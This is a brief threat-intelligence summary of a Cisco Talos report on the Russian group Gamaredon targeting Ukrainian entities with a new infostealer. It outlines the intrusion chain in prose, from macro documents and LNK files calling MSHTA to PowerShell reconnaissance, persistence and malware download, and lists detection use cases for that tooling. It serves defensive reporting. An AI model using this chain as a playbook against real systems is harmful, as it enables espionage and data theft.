Gamaredon APT Targets Ukraine with Infostealer Campaign

Industry: N/A | Level: Tactical | Source: Cisco Talos

Researchers from Cisco Talos have uncovered an espionage campaign associated with Russian threat group Gamaredon (aka IRON TILDEN, Primitive Bear, ACTINIUM, Armageddon, Shuckworm, and DEV-0157) targeting Ukrainian entities with a new information-stealing malware. Phishing campaigns are used to initiate the attack with a weaponized document containing a malicious macro, to download a RAR archive. The archives will typically contain an LNK file using MSHTA.exe to parse a remote XML file. The execution of a PowerShell script initiating a variety of tasks including system reconnaissance, executing a VBScript object, capturing the victim's screen, setup persistence in the autorun registry key and download the attacker's custom infostealer malware. Cisco Talos has not observed the infostealer deployed by Gamaredon to be used in previous campaigns, with low confidence researchers assess the malware is associated with the group's Giddome backdoor family.

Anvilogic Scenario:

• Malicious Document Delivering Malware

Anvilogic Use Cases:

• Wscript/Cscript Execution
• MSHTA.exe execution
• Network Connection with Suspicious Folder

‍